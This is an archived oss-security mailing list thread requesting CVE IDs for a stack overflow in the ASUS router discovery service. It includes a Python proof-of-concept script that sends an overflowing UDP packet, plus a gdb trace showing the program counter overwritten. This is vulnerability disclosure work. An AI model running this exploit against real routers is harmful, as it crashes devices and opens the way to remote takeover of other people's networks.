Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 14 Jul 2017 10:51:29 +0800
From: varsleak <varsleak@...il.com>
To: Zach W <kestrel@...linux.us>, oss-security@...ts.openwall.com
Subject: Re: CVE-IDs request for ASUS wiress router Remote
 Command/Code Execution Vulnerability

They are of course different, CVE-2017-6548 vulnerability code is
located in the networkmap service routine, and I found the vulnerability
in the asusdiscorvery service program.

在 2017年07月14日 02:39, Zach W 写道:
> How is this different from CVE-2017-6548?
> 
> Zach W.
> 
> 
> On 7/12/17 7:57 PM, varsleak wrote:
>> Hello, I review the source of asuswrt-merlin and found a Remote
>> Command/Code Execution, the detail as follows:
>>
>>
>> 1. Vulnerability Details
>>      Affected Vendor:RT-AC5300,RT_AC1900P,RT-AC68U,RT-AC68P,RT-AC88U,
>>      RT-AC66U,RT-AC66U_B1,RT-AC58U,RT-AC56U,RT-AC55U,RT-AC52U,RT-AC51U,
>>      RT-N18U,RT-N66U,RT-N56U,RT-AC3200,RT-AC3100,RT_AC1200GU,
>>      RT_AC1200G,RT-AC1200,RT-AC53,RT-N12HP,RT-N12HP_B1,RT-N12D1,
>>      RT-N12+,RT_N12+_PRO,RT-N16,RT-N300
>>      and Asuswrt-Merlin(https://github.com/RMerl/asuswrt-merlin)
>>      Affected Product: ASUS Wiress Router
>>      Affected Version:  all the latest firmware
>>      Platform: router
>>      Impact: Remote Command/Code Execution
>>      Attack vector: asusdiscorvery service
>>
>> 2. Vulnerability Description
>>      When an ASUS router discovers another router device,
>>      it does not buffer the size of all discovered devices
>>      when it is added to the device list to cause a stack overflow,
>>      resulting in a remote code/command execution vulnerability.
>>      The vulnerability code is as follows:
>>
>> https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/networkmap/ASUS_Discovery.c#L184-L202
>>
>> 3. PoC:
>> <<<EOF
>> # coding=utf-8
>>
>> import time
>> import socket
>> import sys
>> import os
>> import threading
>> import struct
>> import random
>> import time
>> ''' Please run PoC first, and it must run on windows '''
>> class ASUSDiscoveryBufferOverflow:
>> 	""" set remote host and remote port to use exp """
>> 	def __init__(self, RHOST, RPORT, LHOST):
>> 		self.RHOST = RHOST
>> 		self.RPORT = RPORT
>> 		self.LHOST = LHOST
>> 	
>> 	def exploit(self):
>> 		""" execute exploit """
>> 		self.searchDevice()
>> 		self.sentShellCode()
>> 		
>> 	def searchDevice(self, socket_prot = socket.IPPROTO_UDP):
>> 		""" search ASUS Discovery packet """
>> 		print("    [-] try to search ASUS Discovery packet")
>> 		while(True):
>> 			sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_prot)
>> 			sniffer.bind((self.LHOST, 0))
>> 			sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
>> 			if os.name == 'nt':
>> 				sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
>>
>> 			pkt, hosts = sniffer.recvfrom(65565)
>> 			
>> 			if self.RHOST == hosts[0] and '\x11' == pkt[9]:
>> 				if (pkt[28] == '\x0C' and
>> 				pkt[29] == '\x15' and
>> 				pkt[30] == '\x1F' ):
>> 					print("    [+] bingo!")
>> 					break
>>
>> 	def sentShellCode(self):
>> 		s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
>> 		
>> 		for i in range(15):
>> 			s.sendto(self.makeShellCode(), (self.RHOST, self.RPORT))
>> 			print(" [-] sent %d cycle" % (i + 1))
>> 			time.sleep(0.2)
>> 	
>> 	def generatingRandomMacAddr(self):
>> 		tmp1 = random.randint(0, 0xff)
>> 		tmp2 = random.randint(0, 0xff)
>> 		tmp3 = random.randint(0, 0xff)
>> 		tmp4 = random.randint(0, 0xff)
>> 		tmp5 = random.randint(0, 0xff)
>> 		tmp6 = random.randint(0, 0xff)
>> 		return struct.pack('6B', \
>> 			tmp1, tmp2, tmp3, tmp4, tmp5, tmp6)
>> 			
>> 	def makeShellCode(self):	
>> 		shellcode = "\x0c\x16\x1f\x00" # HEADER [ PLEASE NOT MODIFY ]
>> 		shellcode += (128 * b'A') # PKT_GET_INFO.PrinterInfo
>> 		shellcode += (32 * b'A')  # PKT_GET_INFO.SSID
>> 		shellcode += (32 * b'A')  # PKT_GET_INFO.NetMask
>> 		shellcode += (32 * b'A')  # PKT_GET_INFO.ProductID
>> 		shellcode += (16 * b'A')  # PKT_GET_INFO.FirmwareVersion
>> 		shellcode += b'A'		 # PKT_GET_INFO.OperationMode
>> 		shellcode += self.generatingRandomMacAddr() # PKT_GET_INFO.MacAddress	
>> 		shellcode += (261 * b'A') #
>>
>> 		return shellcode
>> 		
>> def main():
>> 	poc = ASUSDiscoveryBufferOverflow('192.168.2.1', 9999, '127.0.0.1')
>> 	
>> 	print("[+] Try to use exploit ...")
>> 	
>> 	poc.exploit()
>> 	
>> 	print("[+] use exploit sucessful.")
>>
>> if __name__ == '__main__':
>> 	main()
>> EOF;
>>
>> 4. gdb trace
>> admin@...N12HP_B1:/tmp/bin# gdb /usr/sbin/asusdiscovery
>>
>> GNU gdb 6.8
>> Copyright (C) 2008 Free Software Foundation, Inc.
>> License GPLv3+: GNU GPL version 3 or later
>> <http://gnu.org/licenses/gpl.html>
>> This is free software: you are free to change and redistribute it.
>> There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
>> and "show warranty" for details.
>> This GDB was configured as "mipsel-linux"...
>> I'm sorry, Dave, I can't do that.  Symbol format `elf32-tradlittlemips'
>> unknown.
>> (gdb) r
>> Starting program: /usr/sbin/asusdiscovery
>>
>> Program received signal SIGSEGV, Segmentation fault.
>> 0x41414141 in ?? ()
>> (gdb) info r
>>           zero       at       v0       v1       a0       a1       a2
>>   a3
>>  R0   00000000 00000000 303e3134 00423a80 7fd650e8 00000001 00001000
>> 00423a80
>>             t0       t1       t2       t3       t4       t5       t6
>>   t7
>>  R8   00423000 00423000 00000581 3a31343a 41414141 2ab89124 41414141
>> 2ab0fe10
>>             s0       s1       s2       s3       s4       s5       s6
>>   s7
>>  R16  41414141 41414141 41414141 41414141 41414141 41414141 41414141
>> 41413e41
>>             t8       t9       k0       k1       gp       sp       s8
>>   ra
>>  R24  00000014 2ab6ad70 7fd65f66 00000000 0041c050 7fd65d30 41414141
>> 41414141
>>         status       lo       hi badvaddr    cause       pc
>>       01009c13 0000035d 00000070 41414140 00000008 41414141
>>           fcsr      fir  restart
>>       00000000 00000000 00000000
>>
>> As we have seen, the registers s0-s8,t4,t6,ra and pc are overwritten by
>> 0x41.
>>
>> Finally, with the ROP can lead to Remote Command Execution.
>>
>> 5. Discover
>>     varsleak of Sichuan Silent Information Technology Co., Ltd
>>     company website: http://www.silence.com.cn/
> 

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ